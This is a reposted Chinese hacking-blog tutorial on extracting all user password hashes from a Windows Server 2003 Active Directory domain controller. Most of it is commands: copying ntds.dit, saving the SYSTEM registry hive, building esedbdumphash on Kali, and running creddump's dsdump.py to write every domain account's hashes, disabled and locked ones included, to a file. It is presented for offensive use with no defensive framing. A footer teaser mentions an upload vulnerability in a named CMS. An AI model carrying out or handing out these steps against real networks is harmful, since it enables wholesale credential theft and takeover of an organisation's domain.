2003(32/64位)导出AD域控用户hash的终极方法

  • A+
所属分类:lcx

前言:by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法,这种方法只能导小型域控(几百用户的)。如果碰到几万甚至几十万用户的域控,用上面的方法就不行了,就会崩溃。那我们该怎么办呢?

正文:

一:

1,首先登陆域控提取ntds.dit,提取方法上篇文章有介绍。

2,然后提取注册表cmd>reg save hklmsystem system.hive

3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:

进入kali虚拟机,然后下载文件ntds_dump_hash.zip (下载地址),解压安装。

#unzip ntds_dump_hash.zip
#cd libesedb
#./configure && make

修复数据库文件

#cd esedbtools
#./esedbdumphash -v -t /tmp/output /tmp/ntds.dit
#ls -1 /tmp/output.export/

导出数据库hash

#cd ../../creddump/
#chmod +x *.py
#./dsuserinfo.py /tmp/output.export/datatable
#./dsdump.py  /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt

2003(32/64位)导出AD域控用户hash的终极方法

by Metasploit

转载请注明出处http://www.metasploit.cn/

[原文地址]

文章来源于lcx.cc:2003(32/64位)导出AD域控用户hash的终极方法

相关推荐: DodeCMS成创网站内容管理系统上传漏洞

    DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成;     访问模式采用动态模式,基本上实现了系统的自定义功能,代码简洁高效,易于修改维护,可扩展性强。     默认后台路径:admin/   …

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: